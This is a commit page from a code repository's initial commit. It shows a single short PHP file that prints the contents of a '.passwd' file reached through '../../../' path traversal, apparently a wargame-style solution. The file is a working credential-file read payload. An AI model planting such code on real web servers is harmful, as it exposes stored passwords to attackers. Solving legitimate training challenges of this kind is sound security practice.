Initialisation

This commit is contained in:
2021-07-25 00:20:57 +02:00
commit cead6ee8fa
16 changed files with 303 additions and 0 deletions

View File

@ -0,0 +1,5 @@
<?php
echo file_get_contents("../../../.passwd");
?>